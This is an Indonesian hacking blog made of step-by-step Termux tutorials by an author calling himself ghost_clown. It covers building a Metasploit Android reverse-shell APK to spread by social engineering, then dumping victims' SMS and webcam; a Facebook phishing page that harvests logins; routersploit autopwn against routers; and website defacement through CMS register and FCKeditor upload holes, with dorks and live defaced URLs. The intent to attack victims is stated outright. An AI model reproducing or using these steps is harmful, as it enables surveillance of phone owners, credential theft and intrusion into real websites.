exploit android dengan metasploit di termux

Halo guys
Kembali lagi sama saya ghost_clown
Gimana nih kabarnya ,udah lama nih saya ngga update sesuatu di blog
Kali ini saya akan share Xploit android dengan metasploit di termux

Nah yang pertama kalian harus install dulu metasploitnya, kalo belom install bisa klik link ini nih TOUCH ME MASTAH :)

Nah kalo kalian udah install tinggal ikutin langkah langkah berikut

Buka termux kalian kemudian masuk directory metasploitnya

$cd metasploit-framework

Kemudian kita buat payload dan aplikasinya dengan cara

$msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.7 LPORT=4444 R > ghostclown.apk

Aplikasi akan tersimpan di directory home ,jika ingin cek atau pindahin aplikasinya bisa dengan root explorer atau semacamnya  letaknya di  root/data/data/com.termux/files/home/metasploit-framework/disini

Lhost harus di sesuaikan dengan ip kalian masing masing,jika terjadi error
Keti "ruby" sebelum mengetik msfvenom

Kemudian buka session baru di termux kalian
Dan jalankan metasploit dengan cara

$msfconsole

Kalau sudah tinggal ketik

$use exploit/multi/handler
$set payload android/metepreter/reverse_tcp
$set lhost 192.168.43.186
$set lport 4444
$exploit
Tinggal sebar aplikasinya ,kalian harus  pinter soceng orang :D

Nah gitu penampakan kalo udah ada korban yang kena rat kita

Kalian bisa dump sms nya dengan cara
$sms_dump

Dan juga dapat striming cameranya dengan cara
$webcam_stram
Sekian tutorial dari saya

#Anonymous Cyber Team
#Maymastah

Tool sqlinjection di android

Selamat siang guys
Gimana udah makan blum? Jangan ngarep mantan yang ngucapin :D
Nah kali ini saya akan share tool SQLInjection  di android
Nah jadi buat kalian defacer user android ngga usah susah susah make sqlimanual :)

kaliini ada 2 tool  yang akan saya bagikan ke kalian :)

Review tool yang ingin saya bagikan

1.Droid SQL

Penampakan tampilan awal tool nya

Penampakan setelah nginjek & ngedump :D

Tools ini otomatis melakukan Error Based Injection, Normal Injection, dan kawan kawan

Jadi kalian tinggak masukin url target aja :)

2.Ando Hackbar

Tools ini banyak pilihanya guys dan juga mudah digunakan

Langsung aja klik link di samping ~> TOUCH ME :D

cara membuat phising dengan weeman

Yoyoyo apa kabar guys ketemu lagi sama saya ghost_clown :)

Karena kemaren saya sudah memberikan tutorial cara install weeman di termux, kali ini saya akan memberikan tutorial cara membuat web phising dengan weeman

Yang belum install weemannya bisa lihat di sini TOUCH ME :)

Pertama masuk dulu directory weeman

$cd weeman

$python2 weeman.py

Kalo udah kita set url web phising kita

Contoh

http://facebook.com

Kita set di termux kita

$set url https://facebook.com

$set port 8080 (port bisa diganti)

$set action_url https://facebook.com

$run

Maka akan seperti ini 

Btw abaikan typo nya :D

Kemudian kita cek ip kita 

Gimana caranya??  Use your brain!!

Kalo udah dapet ipnya

Tinggal ketik di browser kalian dan gabungkan dengan port kalian tadi

Contoh : 192.168.0.7:8080

Maka nanti akan muncul web phising kita

Tinggal tebar, nunggu korban login / untuk mengetes apakah berhasil coba login pake akun kalian,  dan buka lagi termux kalian

Maka nanti akan ada username dan pw yang masuk

Nah kaya gitu penampakanya

Sekian tutorial hari ini semoga bermanfaat bagi kalian :)

#Anonymous Cyber Team

Bantu suport saya dengan klik link di bawah

Klik gw plis

Install weeman di termux

Halo guys, kembali lagi sama saya ghost_clown
Udah lama nih ngga nulis di blog, :) lagi sibuk mikirin mantan :')
Kali ini saya akan memberikan tutorial cara install weeman di termux

Apa itu weeman?  Weeman adalah tool untuk mempermudah kita membuat web
phising

Langsung ke tutorialnya aja ya (saya anggap kalian udah install termux di hp kalian, kalo blum download dulu di PS)

$apt update & apt upgrade
$apt-get install python2
$apt-get install git
$git clone https://github.com/evait-security/weeman.git

Tunggu proses selesai
Kemudian masuk directory weemannya

$cd weeman
$chmod +x weeman.py
$python2 weeman.py


Sekian tutorial kali ini semoga bermanfaat bagi kalian :)

#Anonymous Cyber Team
#IndoXploit
#evait-security

install metasploit di termux

Halo guys selamat malam
Balik lagi sama saya ghost_clown
Gimana kabar mantan kalian :') daripada sedih mikirin mantan mending simak tutorial berikut yuk

Kali ini saya akan memberikan tutorial Cara install METASPLOIT DI TERMUX :)
Langsung aja ya


$apt update && apt upgrade
$apt install curl
$curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
$chmod +x metasploit.sh
$./metasploit.sh

Tunggu sampai selesai,lama tidaknya tergantung sinyak agan :)

Untuk menjalankan metasploitnya ketik aja
$msfconsole

Sekian terimakasih :)

Thanks to:
#Anonymous Cyber Team
#hax4Us

Install Dorkjink di termux

Halo selamat siang guys
Pada kesempatan kaliini saya akan share tool yang sangat keren yaitu DORKJINK
Tool ini dibuat oleh 4WSec dari  Anonymous Cyber Team

Langsung aja

Cara install?
$ apt update && apt upgrade
$ apt install git
$ apt install python2
$ git clone https://github.com/aryanrtm/dorkjink
$ cd dorkjink
$ pip2 install -r requirements.txt
$ python2 dorkjink.py

Thanks to

Anonymous Cyber Team

4WSec 

All member Anonymous Cyber Team

Cara Instal Routersploit di Termux

Halo selamat malam guys
Kali ini saya akan memberikan tutorial cara install routersploit di termux
Sebelumnya saya tidak bertanggung jawab atas tindakan anda karena saya hanya sekedar berbagi ilmu saja :)

Langsung ke langkahnya aja ya guys


$apt install git
$apt install python2
$pip2 install requests


$git clone https://github.com/reverse-shell/routersploit.git
$cd routersploit
$pip install -r requirements.txt
$termux-fix-shebang rsf.py
Kalau semua proses selesai tinggal jalanin dengan comand
$./rsf.py
Dan tada

Sekian tutorial kali ini 

Jangan lupa untuk pantengin terus blog kami ,karena akan ada update tips trik dan tutorial lainya
Selamat malam guys :)
Thanks to
#Anonymous Cyber Team

Install Dirsearch di termux

Selamat pagi guys :)
Kembali lagi nih sama saya ghost_clown
Nah pada kesempatan kali ini saya akan share tutorial CARA INSTALL DIRSEARCH DI TERMUX :)
Pasti kalian udah tau, apa sih dirsearch itu :)
Seperti layaknya dirbuster ,dirfuzzer, directory scanner ,tool ini running di PYTHON3

Langsung saja cara installnya

$apt-get update & upgrade
$apt-get install python
$apt-get install git
$git clone https://github.com/maurosoria/dirsearch.git
$cd dirsearch
$python3 dirsearch.py -u <target> -e <extensinya>

Contoh : python3 dirsearch.py -u http://target.com -e php
Dan ,tada :)

Nah gampang kan
Pantengin terus blog ini karena akan ada update selanjutnya :) see you guys :)

# Thans To
# Anonymous Cyber Team
# Surabayablackhat
# Mauro Soria

Cara Install Brutal Toolkit di Android Via Termux

Halo selamat siang guys apa kabar balik lagi sama saya ghost_clown
Kali ini saya akan memberikan tutorial install Brutal Toolkit di Android dengan Termux

Sedikit penjelasan
 Brutal toolkit adalah tool yang menyuguhkan HID (Human Interfaes Device) attack yang mirip rubber ducky  yang dibuat Darren Kitchen. HID attack itu adalah waktu kita colokin device ini ke laptop atau komputer dia akan ke detect jadi keyboard mouse josytick . Kalian yang sudah mengikuti Mr.Robot dan menyimak adegan dimana Angela mencolokkan usb ke komputer untuk mendapatkan informasi penting.Sayangnya harga Rubber Ducky seperti yang digunakan Angela dalam adegan Mr.Robot mungkin masih mahal bagi kalangan menengah kebawah. Nah disini developer TheFatRat yakni Edo Maland sudah mengembangkan tools untuk "menyulap" Teensy menjadi alat yang fungsinya mirip dengan Rubber Ducky. Teensy ini microcontroller kecil yang hampir sama di rubber ducky tapi perbedaanya hanya di payload nya aja.

Untuk Teensy nya kalian bisa beli di Bukalapak atau yang lain. Terserah beli dimana. Teensy digunakan untuk memasukkan payload kedalam Teensy nya



Langsung ke tutorialnya aja ya guys

Bahan

1.pastikan kalian punya aplikasi Termux
2.Ane Rekomendasikan install Fedora dulu/Ubuntu di termux kalian
3.Koneksi  Internet

Cara Installnya


$git clone https://github.com/Screetsec/Brutal.git

Kalau sudah selesai Buka fedora / Ubuntu di termux kalian,
Karena disini saya pakai fedora jadi begini langkahnya

$startfedora
$cd Brutal
$chmod +x Brutal.sh
$sh Brutal.sh
Dan

Udah ke install deh :) gampang kan

Jika kalian ingin seperti Angela dalam Mr.Robot saat mendapatkan informasi credential menggunakan usb, kalian bisa pilih opsi payload 3 dan 4 dalam tools Brutal


Sekian tutorial dari saya apa bila ada salah kata saya mohon maaf ,pantengin terus blog saya karena akan ada update tutorial tips & trik lainnya see you next time guys

Thanks:
#Linuxsec
#Anonymous Cyber Team

cara menggunakan Routersploit

Halo selamat siang guys ,kembali lagi dengan saia ghost_clown ,gimana kabarnya ?masih jomblo sampai hari ini :v, mangkanya jangan di depan laptop mulu :)

Nah pada kesempatan kali ini saya akan memberikan tutorial cara menjalankan Routersploit di termux 
Bagi kalian yang belum instal bisa lihat di sini ~> touch me :)

Nah langsung saja ke langkah langkahnya ya guys

1. Buka direktori routersploit dan buka routersploit

$cd routersploit
$./rsf.py

2. Ketik
$use scanners/autopwn
$show options
$set target 192.168.1.1(gunakan ip target kalian jangan yang ini)
$set port 8080
$set theards 10
$run

Nah setelah selesai akan muncul banyak tuh jika vuln akan muncul seperti gambar di atas
Jika tidak vuln maka akan seperti ini

Nah jika vuln tinggal ketik exploitnya,kalau beruntung kalian akan mendapat user dan pass nya
Sekian tutorial dari saya semoga bermanfaat
Pantengin terus blog kami untuk tips trik dan tutorial yang lainnya
Selamat siang guys :)

Thanks to
#Anonymous Cyber Team

Bug Register di CMS Suarakalibata

Halo gengs
Kembali lagi dengan saya si gans ghost_clown ~(°v°~)
Nah kali ini saia akan share tutorial deface dengan CMS suarakalibata


#Author : Yrid06 -
                  T1KUS90T
#Dork  :intext:"PENDAFTARAN UNTUK KONTRIBUTOR ARTIKEL"


CMS Swarakalibata adalah CMS Lokomedia yang dimodifikasi oleh Rizal Faizal, Dan sekarang sudah dikembangkan lebih jauh lagi oleh phpmu.com
Bug Register & Upload ini sangat memungkinkan Attacker untuk mendaftar menjadi Admin/Kontributor dan meng-upload backdoor dengan extensi PHP di module berita tanpa harus mem-bypass extensi backdoor tersebut.

Proof Of Concept :

1.dorking di browser kalian
2.Masuk kehalaman register dengan menambahkan register.html pada akhir url target.
Lengkapi form pendaftaran, pilih foto ( cobalah buat membypas extensi shell kalian ).

3.Klik daftar sekarang, dan kalian akan dialihkan ke halaman Administrator.
4.sekarang terserah kalian mau di apain webnya :)

Thanks To :
#T1KUS90T
#xdecode-tools.blogspot.co.id
#Anonymous Cyber Team

cara install webdav di termux

Assalamualaikum wr.wb

Selamat malam guys
Kembali lagi dengan saya ghost_clown
Nah pada kesempatan kali ini saya akan memberikan tutorial INSTALL WEBDAV DI TERMUX

Nah biadanya webdav kan cuma bisa di pc / komputer ,nah ini jadi kabar gembira bagi defacer user android :3 kini webdav hadir di android via termux

Bahan yang harus kalian cari
1.TERMUX (download di play store)

Langsung ke tutornya ae ya guys

$ apt update && upgrade
$ apt install python2
$ pip2 install urllib3 chardet certifi idna requests
$ apt install openssl curl
$ pkg install libcurl
$ ln -s /sdcard
$ cd sdcard
$ mkdir webdav
$ cd webdav
$ curl -k -O https://pastebin.com/raw/HnVyQPtR
$ mv HnVyQPtR webdav.py
$ python2 webdav.py

#Note
Script Deface Pindahin Sendiri Ke Sdcard/webdav

Cara menjalankanya gimana ??
Ok gini caranya
Ketik
$ python2 webdav.py http://sitetarget.com sckalian.htm
Tunggu sampai proses uploade selesai
Kalau berhasil akan seperti ini

Nah kaya gitu

Live target : http://adtrafficweb.grupoeugenio.com.br/look.htm
Sekian tutor dari saya ,jangan lupa pantengin trus blog saya duntuk update tutorial tips dan trik yang lainya
Selamat malam :3


Post By : Mr_/bon'007 (AndroSec1337 Cyber Team)

#Tools Title : WebDav
#Author by: ./Xi4u7
#repost  & reedit by: ghost_clown

Deface POC FCK editor

Hai guys selamat siang
Perkenalkan saya ghost_clown admin yang gans sedunia :)
Pada kesempatan hari ini saya akan membagikan tutorial CARA DEFACE POC FCKeditor
Nah tanpa basa basi lagi langsung ke tutorialnya aja ya guys

Bahan bahan yang harus ada
1.HP/PC
2.DORK: inurl:advert_detail.php?id= (kembangin sendiri)
3.xploit:  Site.co.li/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

Langsung aja ke tahapanya ya guys
1.dorking dengan browser kalian

Pilih salah satu target ae ya guys
2. Masukan xploitnya
Contoh:  http://www.site.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

Maka akan muncul seperti ini

3.cari tempat uploade di bagian bawahnya guys
Dan pilih SC deface kesayangan kalian yang ber extensi html,langsung klik uploade
4.tunggu sampai proses uploade selesai dan kalau sudah ,nama file kalian akan muncul di daftarnya
5.cara liat nya gimana??
Ok gini contohnya
Www.sitelu.com/files/namasclu.html gitu
Dan tada

Live target: http://immo-valmont.com/files/look.html
Sekian tutorial dari saya apabila ada salah kata saia mohon maaf
Pantengin terus blog ini untuk update postingan berikutnya
See you guys :)